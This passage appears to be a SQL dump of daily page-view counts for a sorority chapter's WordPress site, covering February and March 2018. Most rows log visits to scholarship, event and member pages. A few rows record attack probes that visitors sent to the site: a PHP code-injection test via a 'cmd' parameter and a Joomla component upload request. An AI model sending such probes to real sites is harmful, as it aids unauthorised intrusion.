,1,772),('/service/youth/','2018-02-22',1,738),('/service/zen/','2018-02-22',1,786),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-02-22',1,1258),('/event/5th-annual-denim-pearlz-party/','2018-02-22',6,1249),('/event/breakfast-on-the-go/','2018-02-22',1,493),('/event/a-pretty-polished-affair/','2018-02-22',2,485),('/lgz-launches-new-college-preparation-workshops/','2018-02-22',1,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2018-02-22',1,956),('/','2018-02-23',296,6),('/?wc-ajax=get_refreshed_fragments','2018-02-23',22,6),('/scholarship/','2018-02-23',5,797),('/scholarship/application/','2018-02-23',6,804),('/event/5th-annual-denim-pearlz-party/','2018-02-23',13,1249),('/scholarship','2018-02-23',2,797),('/history/','2018-02-23',1,190),('/service/appa/','2018-02-23',2,781),('/event/a-pretty-polished-affair/','2018-02-23',1,485),('/service/','2018-02-23',1,247),('/service/breakfastonthego/','2018-02-23',1,772),('/lgz-celebrates-35-years-service-howard-county-md/','2018-02-23',1,956),('/service/zen/','2018-02-23',1,786),('/ts_teams/yasmine-allen/','2018-02-23',1,1228),('/scholarship/recommendation/','2018-02-23',2,1170),('/','2018-02-24',400,6),('/service/appa/','2018-02-24',2,781),('/event/5th-annual-denim-pearlz-party/','2018-02-24',11,1249),('/?wc-ajax=get_refreshed_fragments','2018-02-24',26,6),('/ts_teams/nathalia-drew/','2018-02-24',3,1084),('/scholarship/','2018-02-24',6,797),('/service/','2018-02-24',2,247),('/membership/','2018-02-24',2,576),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-02-24',1,1258),('/scholarship/application/','2018-02-24',2,804),('/cause/scholarship/','2018-02-24',2,59),('/history/','2018-02-24',1,190),('/scholarship','2018-02-24',2,797),('/?up_auto_log=true','2018-02-24',1,6),('/ts_teams/linda-price/','2018-02-24',1,867),('/','2018-02-25',431,6),('/scholarship/','2018-02-25',11,797),('/?wc-ajax=get_refreshed_fragments','2018-02-25',25,6),('/service/appa/','2018-02-25',6,781),('/service/breakfastonthego/','2018-02-25',6,772),('/event/a-pretty-polished-affair/','2018-02-25',2,485),('/scholarship/application/','2018-02-25',13,804),('/scholarship/lgzscholarshipreleaseform/','2018-02-25',2,1173),('/scholarship/recommendation/','2018-02-25',4,1170),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-02-25',2,1258),('/history/','2018-02-25',7,190),('/scholarship','2018-02-25',2,797),('/scholarship/application','2018-02-25',1,804),('/index.php?option=com_user&task=register','2018-02-25',1,6),('/?option=com_user&task=register','2018-02-25',1,6),('/ts_teams/shanee-satchell/','2018-02-25',2,820),('/service/zen/','2018-02-25',2,786),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2018-02-25',2,689),('/service/','2018-02-25',1,247),('/service/youth/','2018-02-25',1,738),('/event/5th-annual-denim-pearlz-party/','2018-02-25',1,1249),('/event/breakfast-on-the-go/','2018-02-25',1,493),('/lgz-launches-new-college-preparation-workshops/','2018-02-25',1,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2018-02-25',1,956),('/scholarship/soror-conway1/','2018-02-25',1,1179),('/ts_teams/josephine-gross/','2018-02-25',1,1232),('/ts_teams/oretta-timmons/','2018-02-25',1,1230),('/ts_teams/yasmine-allen/','2018-02-25',1,1228),('/ts_teams/jelani-dula/','2018-02-25',1,1226),('/ts_teams/christopher-flowers/','2018-02-25',1,1224),('/ts_teams/journey-mcmillan/','2018-02-25',1,1222),('/ts_teams/nicholas-claud/','2018-02-25',1,1220),('/','2018-02-26',361,6),('/scholarship/','2018-02-26',11,797),('/scholarship/application/','2018-02-26',16,804),('/?wc-ajax=get_refreshed_fragments','2018-02-26',32,6),('/scholarship','2018-02-26',1,797),('/event/5th-annual-denim-pearlz-party/','2018-02-26',2,1249),('/history/','2018-02-26',2,190),('/service/youth/','2018-02-26',2,738),('/membership/','2018-02-26',3,576),('/lgz-launches-new-college-preparation-workshops/','2018-02-26',1,1243),('/service/','2018-02-26',1,247),('/event/breakfast-on-the-go/','2018-02-26',2,493),('/event/a-pretty-polished-affair/','2018-02-26',2,485),('/scholarship/recommendation/','2018-02-26',3,1170),('/scholarship/application/?gf_token=bd3b999d16ed4968a5b6a5351185b0c6','2018-02-26',1,804),('/download/constitution-by-laws/','2018-02-27',2,989),('/membership/','2018-02-27',3,576),('/','2018-02-27',162,6),('/?wc-ajax=get_refreshed_fragments','2018-02-27',20,6),('/scholarship/application/','2018-02-27',11,804),('/scholarship/','2018-02-27',9,797),('/scholarship/lgzscholarshipreleaseform/','2018-02-27',1,1173),('/history/','2018-02-27',6,190),('/scholarship/recommendation/','2018-02-27',4,1170),('/service/','2018-02-27',3,247),('/service/appa/','2018-02-27',3,781),('/ts_teams/josephine-gross/','2018-02-27',2,1232),('/ts_teams/oretta-timmons/','2018-02-27',2,1230),('/ts_teams/yasmine-allen/','2018-02-27',2,1228),('/ts_teams/jelani-dula/','2018-02-27',2,1226),('/ts_teams/christopher-flowers/','2018-02-27',2,1224),('/ts_teams/journey-mcmillan/','2018-02-27',2,1222),('/ts_teams/nicholas-claud/','2018-02-27',2,1220),('/scholarship','2018-02-27',1,797),('/lgz-launches-new-college-preparation-workshops/','2018-02-27',2,1243),('/scholarship/application/?gf_token=0431ecd837d54c71a0684dcc0916a1b6','2018-02-27',1,804),('/service/breakfastonthego/','2018-02-27',1,772),('/service/youth/','2018-02-27',1,738),('/service/zen/','2018-02-27',1,786),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-02-27',1,1258),('/event/5th-annual-denim-pearlz-party/','2018-02-27',2,1249),('/event/a-pretty-polished-affair/','2018-02-27',1,485),('/event/breakfast-on-the-go/','2018-02-27',1,493),('/lgz-celebrates-35-years-service-howard-county-md/','2018-02-27',1,956),('/ts_teams/dawn-j-kemp/','2018-02-27',1,817),('/membership/','2018-02-28',3,576),('/','2018-02-28',78,6),('/scholarship/recommendation/','2018-02-28',10,1170),('/?wc-ajax=get_refreshed_fragments','2018-02-28',23,6),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-02-28',1,1258),('/scholarship/application/','2018-02-28',17,804),('/ts_teams/tracy-irvin/','2018-02-28',2,815),('/scholarship/','2018-02-28',6,797),('/scholarship/lgzscholarshipreleaseform/','2018-02-28',2,1173),('/scholarship/application/?gf_token=f0090e1d52824af6a626797118b317b4','2018-02-28',5,804),('/history/','2018-02-28',2,190),('/lgz-launches-new-college-preparation-workshops/','2018-02-28',1,1243),('/scholarship','2018-02-28',1,797),('/service/youth/','2018-02-28',1,738),('/service/breakfastonthego/','2018-02-28',1,772),('/','2018-03-01',71,6),('/wp-register.php','2018-03-01',1,6),('/history/','2018-03-01',6,190),('/?wc-ajax=get_refreshed_fragments','2018-03-01',26,6),('/membership/','2018-03-01',4,576),('/event/5th-annual-denim-pearlz-party','2018-03-01',1,1249),('/event/5th-annual-denim-pearlz-party/','2018-03-01',1,1249),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications','2018-03-01',2,1258),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-03-01',2,1258),('/scholarship','2018-03-01',2,797),('/scholarship/','2018-03-01',12,797),('/lgz-celebrates-35-years-service-howard-county-md','2018-03-01',1,956),('/lgz-celebrates-35-years-service-howard-county-md/','2018-03-01',1,956),('/scholarship/recommendation','2018-03-01',1,1170),('/scholarship/recommendation/','2018-03-01',5,1170),('/cause/scholarship/','2018-03-01',2,59),('/scholarship/application/?gf_token=f0090e1d52824af6a626797118b317b4','2018-03-01',5,804),('/scholarship/application/','2018-03-01',24,804),('/service/appa/','2018-03-01',2,781),('/service/appa','2018-03-01',1,781),('/event/breakfast-on-the-go','2018-03-01',1,493),('/event/breakfast-on-the-go/','2018-03-01',1,493),('/?wc-ajax=get_refreshed_fragments','2018-03-02',21,6),('/','2018-03-02',86,6),('/service/','2018-03-02',1,247),('/history/','2018-03-02',1,190),('/scholarship/','2018-03-02',8,797),('/scholarship/application/','2018-03-02',20,804),('/scholarship/recommendation/','2018-03-02',5,1170),('/service/appa/','2018-03-02',1,781),('/service/breakfastonthego/','2018-03-02',2,772),('/service/youth/','2018-03-02',1,738),('/service/zen/','2018-03-02',1,786),('/ts_teams/josephine-gross/','2018-03-02',1,1232),('/scholarship/lgzscholarshipreleaseform/','2018-03-02',3,1173),('/scholarship/application/?gf_token=07b6e766080b4583a68f1e74d5008435','2018-03-02',1,804),('/event/5th-annual-denim-pearlz-party/','2018-03-02',1,1249),('/scholarship','2018-03-02',2,797),('/scholarship/application/?gf_token=349dc156a84e4d69877cdf80c324daf0','2018-03-02',1,804),('/','2018-03-03',71,6),('/history/','2018-03-03',3,190),('/scholarship/','2018-03-03',1,797),('/scholarship/application/','2018-03-03',3,804),('/scholarship/recommendation/','2018-03-03',1,1170),('/service/','2018-03-03',1,247),('/service/appa/','2018-03-03',1,781),('/service/breakfastonthego/','2018-03-03',1,772),('/service/youth/','2018-03-03',2,738),('/service/zen/','2018-03-03',3,786),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-03-03',1,1258),('/event/5th-annual-denim-pearlz-party/','2018-03-03',4,1249),('/event/a-pretty-polished-affair/','2018-03-03',2,485),('/event/breakfast-on-the-go/','2018-03-03',1,493),('/lgz-launches-new-college-preparation-workshops/','2018-03-03',1,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2018-03-03',1,956),('/?wc-ajax=get_refreshed_fragments','2018-03-03',10,6),('/scholarship/application/?gf_token=0efdc7d693ff45a19bfec69d5a077146','2018-03-03',1,804),('/scholarship/application/?gf_token=f0090e1d52824af6a626797118b317b4','2018-03-03',1,804),('/ts_teams/linda-brigmon/','2018-03-03',1,886),('/','2018-03-04',79,6),('/scholarship/application/','2018-03-04',13,804),('/scholarship/','2018-03-04',6,797),('/?wc-ajax=get_refreshed_fragments','2018-03-04',10,6),('/scholarship/recommendation/','2018-03-04',3,1170),('/scholarship/application/?gf_token=07b6e766080b4583a68f1e74d5008435','2018-03-04',3,804),('/','2018-03-05',53,6),('/?wc-ajax=get_refreshed_fragments','2018-03-05',20,6),('/service/appa/','2018-03-05',1,781),('/scholarship/application/?gf_token=f0090e1d52824af6a626797118b317b4','2018-03-05',1,804),('/scholarship/application/','2018-03-05',10,804),('/scholarship/','2018-03-05',8,797),('/scholarship/recommendation/','2018-03-05',3,1170),('/membership/','2018-03-05',2,576),('/scholarship','2018-03-05',1,797),('/scholarship/application/?gf_token=349dc156a84e4d69877cdf80c324daf0','2018-03-05',1,804),('/scholarship/application/','2018-03-06',8,804),('/','2018-03-06',73,6),('/?wc-ajax=get_refreshed_fragments','2018-03-06',19,6),('/history/','2018-03-06',3,190),('/scholarship/','2018-03-06',3,797),('/scholarship/recommendation/','2018-03-06',20,1170),('/service/','2018-03-06',1,247),('/service/appa/','2018-03-06',1,781),('/service/breakfastonthego/','2018-03-06',1,772),('/service/youth/','2018-03-06',2,738),('/service/zen/','2018-03-06',1,786),('/event/5th-annual-denim-pearlz-party/','2018-03-06',3,1249),('/event/breakfast-on-the-go/','2018-03-06',1,493),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-03-06',1,1258),('/event/a-pretty-polished-affair/','2018-03-06',1,485),('/lgz-launches-new-college-preparation-workshops/','2018-03-06',1,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2018-03-06',1,956),('/user/','2018-03-06',1,547),('/scholarship','2018-03-06',2,797),('/membership/','2018-03-06',3,576),('/scholarship/application/?gf_token=41ef7f916dcf46a6b63e28e0cc0cc633','2018-03-06',1,804),('/scholarship/application/?gf_token=d2444ae118b047e5879f54c7d2478f82','2018-03-06',1,804),('/membership/','2018-03-07',3,576),('/','2018-03-07',59,6),('/?wc-ajax=get_refreshed_fragments','2018-03-07',12,6),('/lgz-celebrates-35-years-service-howard-county-md','2018-03-07',1,956),('/lgz-celebrates-35-years-service-howard-county-md/','2018-03-07',1,956),('/scholarship/recommendation','2018-03-07',1,1170),('/scholarship/recommendation/','2018-03-07',2,1170),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications','2018-03-07',1,1258),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-03-07',2,1258),('/scholarship','2018-03-07',3,797),('/scholarship/','2018-03-07',9,797),('/event/5th-annual-denim-pearlz-party','2018-03-07',1,1249),('/event/5th-annual-denim-pearlz-party/','2018-03-07',3,1249),('/event/a-pretty-polished-affair/','2018-03-07',1,485),('/lgz-launches-new-college-preparation-workshops/','2018-03-07',1,1243),('/scholarship/application/','2018-03-07',7,804),('/lgz-launches-new-college-preparation-workshops/feed/','2018-03-07',1,1243),('/history/','2018-03-07',1,190),('/event/breakfast-on-the-go/','2018-03-07',1,493),('/cause/scholarship/','2018-03-07',1,59),('/cause/marchofdimes-2/','2018-03-07',1,90),('/service/','2018-03-07',1,247),('/service/zen/','2018-03-07',1,786),('/ts_teams/christy-lewis/','2018-03-07',1,818),('/scholarship/application/?gf_token=becf3c42098e45e9b3ae133b114b2a00','2018-03-07',1,804),('/scholarship/','2018-03-08',15,797),('/?wc-ajax=get_refreshed_fragments','2018-03-08',41,6),('/scholarship/application/','2018-03-08',30,804),('/','2018-03-08',79,6),('/ts_teams/cassandra-dorsey/','2018-03-08',1,880),('/scholarship/application/?gf_token=becf3c42098e45e9b3ae133b114b2a00','2018-03-08',1,804),('/scholarship/application/?gf_token=07b6e766080b4583a68f1e74d5008435','2018-03-08',2,804),('/scholarship/recommendation/','2018-03-08',4,1170),('/history/','2018-03-08',1,190),('/membership/','2018-03-08',2,576),('/scholarship','2018-03-08',2,797),('/scholarship/lgzscholarshipreleaseform/','2018-03-08',6,1173),('/scholarship/application/?gf_token=dedec187f97d4c6f8692369efd62a562','2018-03-08',4,804),('/event/a-pretty-polished-affair/','2018-03-08',3,485),('/service/appa/','2018-03-08',1,781),('/ts_teams/yasmine-allen/','2018-03-08',2,1228),('/scholarship/application/?gf_token=d1d554404c5b4311917b24cdcbc07a33','2018-03-08',1,804),('/scholarship/','2018-03-09',14,797),('/?wc-ajax=get_refreshed_fragments','2018-03-09',20,6),('/','2018-03-09',91,6),('/scholarship/application/?gf_token=d2444ae118b047e5879f54c7d2478f82','2018-03-09',1,804),('/history/','2018-03-09',1,190),('/scholarship/application/','2018-03-09',10,804),('/scholarship/recommendation/','2018-03-09',1,1170),('/service/','2018-03-09',2,247),('/service/appa/','2018-03-09',1,781),('/service/youth/','2018-03-09',1,738),('/service/breakfastonthego/','2018-03-09',1,772),('/service/zen/','2018-03-09',1,786),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-03-09',1,1258),('/event/5th-annual-denim-pearlz-party/','2018-03-09',1,1249),('/event/a-pretty-polished-affair/','2018-03-09',2,485),('/event/breakfast-on-the-go/','2018-03-09',1,493),('/lgz-launches-new-college-preparation-workshops/','2018-03-09',1,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2018-03-09',1,956),('/ts_teams/rose-matthews/','2018-03-09',1,870),('/scholarship/lgzscholarshipreleaseform/','2018-03-09',4,1173),('/scholarship/application','2018-03-09',1,804),('/','2018-03-10',47,6),('/history/','2018-03-10',4,190),('/?wc-ajax=get_refreshed_fragments','2018-03-10',29,6),('/ts_teams/linda-price/','2018-03-10',1,867),('/event/5th-annual-denim-pearlz-party/','2018-03-10',1,1249),('/scholarship/application/','2018-03-10',45,804),('/scholarship/','2018-03-10',11,797),('/scholarship/recommendation/','2018-03-10',9,1170),('/scholarship/application/?gf_token=c5b8f9d75ca44c4c93d66b8a6fca9613','2018-03-10',1,804),('/lgz-celebrates-35-years-service-howard-county-md/','2018-03-10',3,956),('/scholarship/application/?gf_token=07b6e766080b4583a68f1e74d5008435','2018-03-10',3,804),('/scholarship/application/?gf_token=dedec187f97d4c6f8692369efd62a562','2018-03-10',1,804),('/scholarship/application/?gf_token=867e51b87a084173a98a931cee464b2b','2018-03-10',1,804),('/scholarship','2018-03-10',1,797),('/scholarship/application/?gf_token=becf3c42098e45e9b3ae133b114b2a00','2018-03-10',2,804),('/','2018-03-11',57,6),('/scholarship/application/?gf_token=becf3c42098e45e9b3ae133b114b2a00','2018-03-11',1,804),('/?wc-ajax=get_refreshed_fragments','2018-03-11',35,6),('/scholarship/application/','2018-03-11',45,804),('/scholarship/','2018-03-11',7,797),('/scholarship/application/?gf_token=6527d6a7909a44a48a58c2173c443396','2018-03-11',1,804),('/service/','2018-03-11',1,247),('/scholarship/application/?gf_token=c5b8f9d75ca44c4c93d66b8a6fca9613','2018-03-11',1,804),('/scholarship/lgzscholarshipreleaseform/','2018-03-11',1,1173),('/scholarship/application/?gf_token=b4598ebe20014e518a5c8af587e550e9','2018-03-11',4,804),('/scholarship/application/?gf_token=349dc156a84e4d69877cdf80c324daf0','2018-03-11',7,804),('/scholarship','2018-03-11',1,797),('/scholarship/recommendation/','2018-03-11',3,1170),('/download/constitution-by-laws/','2018-03-11',3,989),('/?cmd=die(\\\'===!\\\'.\\\'===\\\');','2018-03-11',1,6),('/?cmd=die%28%5C%27%3D%3D%3D%21%5C%27.%5C%27%3D%3D%3D%5C%27%29%3B','2018-03-11',1,6),('/','2018-03-12',88,6),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications','2018-03-12',2,1258),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-03-12',4,1258),('/service/appa','2018-03-12',2,781),('/service/appa/','2018-03-12',4,781),('/event/breakfast-on-the-go','2018-03-12',2,493),('/event/breakfast-on-the-go/','2018-03-12',4,493),('/?wc-ajax=get_refreshed_fragments','2018-03-12',28,6),('/history/','2018-03-12',6,190),('/scholarship/','2018-03-12',15,797),('/scholarship/application/','2018-03-12',29,804),('/scholarship/recommendation/','2018-03-12',10,1170),('/service/','2018-03-12',3,247),('/service/breakfastonthego/','2018-03-12',2,772),('/service/youth/','2018-03-12',3,738),('/service/zen/','2018-03-12',10,786),('/event/5th-annual-denim-pearlz-party/','2018-03-12',3,1249),('/event/a-pretty-polished-affair/','2018-03-12',2,485),('/lgz-launches-new-college-preparation-workshops/','2018-03-12',2,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2018-03-12',4,956),('/scholarship/soror-conway1/','2018-03-12',2,1179),('/scholarship/lgzscholarshipreleaseform/','2018-03-12',8,1173),('/ts_teams/josephine-gross/','2018-03-12',1,1232),('/ts_teams/oretta-timmons/','2018-03-12',1,1230),('/ts_teams/yasmine-allen/','2018-03-12',1,1228),('/ts_teams/jelani-dula/','2018-03-12',4,1226),('/ts_teams/christopher-flowers/','2018-03-12',1,1224),('/ts_teams/journey-mcmillan/','2018-03-12',1,1222),('/ts_teams/nicholas-claud/','2018-03-12',1,1220),('/scholarship/application/?gf_token=349dc156a84e4d69877cdf80c324daf0','2018-03-12',7,804),('/scholarship','2018-03-12',1,797),('/scholarship/application/?gf_token=becf3c42098e45e9b3ae133b114b2a00','2018-03-12',2,804),('/scholarship/','2018-03-13',39,797),('/?wc-ajax=get_refreshed_fragments','2018-03-13',54,6),('/','2018-03-13',72,6),('/membership/','2018-03-13',4,576),('/scholarship/application/','2018-03-13',14,804),('/scholarship/recommendation/','2018-03-13',17,1170),('/history/','2018-03-13',3,190),('/scholarship/application/?gf_token=becf3c42098e45e9b3ae133b114b2a00','2018-03-13',2,804),('/scholarship','2018-03-13',5,797),('/scholarship/lgzscholarshipreleaseform/','2018-03-13',4,1173),('/service/','2018-03-13',3,247),('/service/youth/','2018-03-13',2,738),('/service/zen/','2018-03-13',1,786),('/service/breakfastonthego/','2018-03-13',1,772),('/service/appa/','2018-03-13',1,781),('/scholarship/application','2018-03-13',1,804),('/scholarship/application/?gf_token=349dc156a84e4d69877cdf80c324daf0','2018-03-13',4,804),('/scholarship/application/?gf_token=d1d554404c5b4311917b24cdcbc07a33','2018-03-13',1,804),('/scholarship/application/?gf_token=b4598ebe20014e518a5c8af587e550e9','2018-03-13',1,804),('/','2018-03-14',91,6),('/scholarship/application/?gf_token=46164e697789430b912bcdeb98387e81','2018-03-14',1,804),('/?wc-ajax=get_refreshed_fragments','2018-03-14',25,6),('/scholarship/','2018-03-14',13,797),('/scholarship/application/','2018-03-14',13,804),('/scholarship/recommendation/','2018-03-14',10,1170),('/service/youth/','2018-03-14',3,738),('/history/','2018-03-14',4,190),('/membership/','2018-03-14',1,576),('/index.php?lol=1','2018-03-14',1,6),('/event/a-pretty-polished-affair/','2018-03-14',1,485),('/lgz-celebrates-35-years-service-howard-county-md/','2018-03-14',1,956),('/lgz-launches-new-college-preparation-workshops/','2018-03-14',1,1243),('/service/','2018-03-14',1,247),('/service/breakfastonthego/','2018-03-14',1,772),('/service/appa/','2018-03-14',1,781),('/service/zen/','2018-03-14',1,786),('/ts_teams/ebony-cogdell/','2018-03-14',1,882),('/scholarship/application/?gf_token=bd3b999d16ed4968a5b6a5351185b0c6','2018-03-14',2,804),('/scholarship/lgzscholarshipreleaseform/','2018-03-14',6,1173),('/scholarship/application/?gf_token=349dc156a84e4d69877cdf80c324daf0','2018-03-14',1,804),('/scholarship','2018-03-14',1,797),('/','2018-03-15',94,6),('/lgz-celebrates-35-years-service-howard-county-md/','2018-03-15',1,956),('/service/breakfastonthego/','2018-03-15',1,772),('/service/','2018-03-15',1,247),('/service/zen/','2018-03-15',1,786),('/service/youth/','2018-03-15',1,738),('/service/appa/','2018-03-15',1,781),('/history/','2018-03-15',4,190),('/lgz-launches-new-college-preparation-workshops/','2018-03-15',1,1243),('/event/a-pretty-polished-affair/','2018-03-15',1,485),('/?wc-ajax=get_refreshed_fragments','2018-03-15',22,6),('/scholarship/','2018-03-15',21,797),('/scholarship/application/','2018-03-15',8,804),('/scholarship/recommendation/','2018-03-15',6,1170),('/scholarship','2018-03-15',2,797),('/scholarship/lgzscholarshipreleaseform/','2018-03-15',3,1173),('/','2018-03-16',86,6),('/history/','2018-03-16',9,190),('/scholarship/','2018-03-16',16,797),('/service/','2018-03-16',1,247),('/service/appa/','2018-03-16',4,781),('/service/breakfastonthego/','2018-03-16',1,772),('/service/zen/','2018-03-16',1,786),('/service/youth/','2018-03-16',1,738),('/event/a-pretty-polished-affair/','2018-03-16',1,485),('/lgz-launches-new-college-preparation-workshops/','2018-03-16',1,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2018-03-16',1,956),('/scholarship/recommendation/','2018-03-16',9,1170),('/?wc-ajax=get_refreshed_fragments','2018-03-16',25,6),('/scholarship/application/','2018-03-16',8,804),('/scholarship/soror-conway1/','2018-03-16',1,1179),('/scholarship/application/?gf_token=d1d554404c5b4311917b24cdcbc07a33','2018-03-16',1,804),('/','2018-03-17',77,6),('/service/appa/','2018-03-17',13,781),('/history/','2018-03-17',8,190),('/?wc-ajax=get_refreshed_fragments','2018-03-17',21,6),('/scholarship/','2018-03-17',11,797),('/service/breakfastonthego/','2018-03-17',1,772),('/service/youth/','2018-03-17',4,738),('/service/zen/','2018-03-17',1,786),('/scholarship/application/','2018-03-17',2,804),('/service/','2018-03-17',5,247),('/scholarship/application/?gf_token=0efdc7d693ff45a19bfec69d5a077146','2018-03-17',1,804),('/scholarship/lgzscholarshipreleaseform/','2018-03-17',1,1173),('/membership/','2018-03-17',3,576),('/','2018-03-18',55,6),('/service/','2018-03-18',1,247),('/?wc-ajax=get_refreshed_fragments','2018-03-18',14,6),('/service/appa/','2018-03-18',3,781),('/membership/','2018-03-18',2,576),('/history/','2018-03-18',2,190),('/scholarship/application/?gf_token=becf3c42098e45e9b3ae133b114b2a00','2018-03-18',4,804),('/scholarship/','2018-03-18',9,797),('/scholarship/application/','2018-03-18',6,804),('/ts_teams/josephine-gross/','2018-03-18',1,1232),('/download/constitution-by-laws/','2018-03-18',2,989),('/','2018-03-19',56,6),('/ts_teams/ava-lawson/','2018-03-19',1,872),('/ts_teams/lillet-williams/','2018-03-19',1,823),('/ts_teams/michele-franklin/','2018-03-19',1,877),('/ts_teams/patreece-carter/','2018-03-19',1,885),('/membership/','2018-03-19',1,576),('/service/appa/','2018-03-19',5,781),('/?wc-ajax=get_refreshed_fragments','2018-03-19',11,6),('/scholarship/','2018-03-19',11,797),('/scholarship','2018-03-19',4,797),('/history/','2018-03-19',2,190),('/service/breakfastonthego/','2018-03-19',2,772),('/service/youth/','2018-03-19',1,738),('/service/zen/','2018-03-19',1,786),('/scholarship/application/','2018-03-19',2,804),('/scholarship/','2018-03-20',28,797),('/?wc-ajax=get_refreshed_fragments','2018-03-20',34,6),('/','2018-03-20',55,6),('/scholarship/recommendation/','2018-03-20',3,1170),('/service/appa/','2018-03-20',4,781),('/scholarship','2018-03-20',2,797),('/service/','2018-03-20',1,247),('/membership/','2018-03-20',2,576),('/scholarship/application/','2018-03-20',6,804),('/scholarship/application/?gf_token=d2444ae118b047e5879f54c7d2478f82','2018-03-20',1,804),('/history/','2018-03-20',1,190),('/','2018-03-21',82,6),('/?wc-ajax=get_refreshed_fragments','2018-03-21',45,6),('/service/appa/','2018-03-21',8,781),('/scholarship/','2018-03-21',30,797),('/membership/','2018-03-21',1,576),('/scholarship/application/','2018-03-21',13,804),('/history/','2018-03-21',4,190),('/scholarship','2018-03-21',12,797),('/scholarship/recommendation/','2018-03-21',2,1170),('/download/constitution-by-laws/','2018-03-21',5,989),('/lgz-launches-new-college-preparation-workshops/','2018-03-21',3,1243),('/scholarship/lgzscholarshipreleaseform/','2018-03-21',1,1173),('/service/youth/','2018-03-21',2,738),('/scholarship/application/?gf_token=46164e697789430b912bcdeb98387e81','2018-03-21',1,804),('/service/','2018-03-21',1,247),('/service/breakfastonthego/','2018-03-21',1,772),('/service/zen/','2018-03-21',1,786),('/','2018-03-22',70,6),('/scholarship','2018-03-22',21,797),('/scholarship/','2018-03-22',31,797),('/?wc-ajax=get_refreshed_fragments','2018-03-22',34,6),('/index.php?option=com_adsmanager&task=upload&tmpl=component','2018-03-22',1,6),('/?option=com_adsmanager&task=upload&tmpl=component','2018-03-22',1,6),('/download/constitution-by-laws/','2018-03-22',2,989),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications','2018-03-22',1,1258),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-03-22',3,1258),('/lgz-celebrates-35-years-service-howard-county-md','2018-03-22',1,956),('/lgz-celebrates-35-years-service-howard-county-md/','2018-03-22',1,956),('/event/howard-county-volunteer-year-reception','2018-03-22',1,1268),('/event/howard-county-volunteer-year-reception/','2018-03-22',1,1268),('/service/appa/','2018-03-22',5,781),('/scholarship/recommendation/','2018-03-22',7,1170),('/event/a-pretty-polished-affair/','2018-03-22',2,485),('/scholarship/application/','2018-03-22',8,804),('/scholarship/application/?gf_token=adde7e3c480547b9abed971e10974209','2018-03-22',2,804),('/scholarship/lgzscholarshipreleaseform/','2018-03-22',3,1173),('/ts_teams/tracy-irvin/','2018-03-22',1,815),('/history/','2018-03-22',1,190),('/scholarship/recommendation/','2018-03-23',9,1170),('/?wc-ajax=get_refreshed_fragments','2018-03-23',42,6),('/download/constitution-by-laws/','2018-03-23',1,989),('/','2018-03-23',48,6),('/scholarship/application/','2018-03-23',8,804),('/service/appa/','2018-03-23',2,781),('/scholarship/','2018-03-23',34,797),('/scholarship','2018-03-23',18,797),('/event/a-pretty-polished-affair/','2018-03-23',1,485),('/history/','2018-03-23',2,190),('/','2018-03-24',97,6),('/?wc-ajax=get_refreshed_fragments','2018-03-24',37,6),('/scholarship','2018-03-24',3,797),('/scholarship/','2018-03-24',36,797),('/history/','2018-03-24',5,190),('/scholarship/application/','2018-03-24',13,804),('/scholarship/application/?gf_token=c7dee752d76049af924f766211defa3b','2018-03-24',1,804),('/service/appa/','2018-03-24',7,781),('/scholarship/recommendation/','2018-03-24',5,1170),('/scholarship/lgzscholarshipreleaseform/','2018-03-24',5,1173),('/event/a-pretty-polished-affair/','2018-03-24',2,485),('/service/','2018-03-24',1,247),('/service/breakfastonthego/','2018-03-24',1,772),('/lgz-celebrates-35-years-service-howard-county-md/','2018-03-24',1,956),('/service/zen/','2018-03-24',1,786),('/scholarship/application/?gf_token=b4eca622c8f44c9f93c7da5d403d1dda','2018-03-24',2,804),('/','2018-03-25',72,6),('/service/appa/','2018-03-25',8,781),('/?wc-ajax=get_refreshed_fragments','2018-03-25',57,6),('/history/','2018-03-25',9,190),('/scholarship/','2018-03-25',34,797),('/service/','2018-03-25',5,247),('/service/breakfastonthego/','2018-03-25',5,772),('/service/youth/','2018-03-25',4,738),('/service/zen/','2018-03-25',3,786),('/event/a-pretty-polished-affair/','2018-03-25',2,485),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-03-25',2,1258),('/event/howard-county-volunteer-year-reception/','2018-03-25',2,1268),('/event/ms-walk-2017/','2018-03-25',2,1020),('/event/breakfast-on-the-go/','2018-03-25',2,493),('/event/march-dimes-march-babies/','2018-03-25',2,1007),('/lgz-launches-new-college-preparation-workshops/','2018-03-25',2,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2018-03-25',2,956),('/scholarship/soror-conway1/','2018-03-25',2,1179),('/scholarship/lgzscholarshipreleaseform/','2018-03-25',7,1173),('/scholarship/application/','2018-03-25',34,804),('/scholarship/recommendation/','2018-03-25',13,1170),('/ts_teams/josephine-gross/','2018-03-25',2,1232),('/ts_teams/oretta-timmons/','2018-03-25',2,1230),('/ts_teams/yasmine-allen/','2018-03-25',2,1228),('/ts_teams/jelani-dula/','2018-03-25',2,1226),('/ts_teams/christopher-flowers/','2018-03-25',2,1224),('/ts_teams/journey-mcmillan/','2018-03-25',2,1222),('/ts_teams/nicholas-claud/','2018-03-25',2,1220),('/scholarship','2018-03-25',7,797),('/scholarship/application/?gf_token=becf3c42098e45e9b3ae133b114b2a00','2018-03-25',6,804),(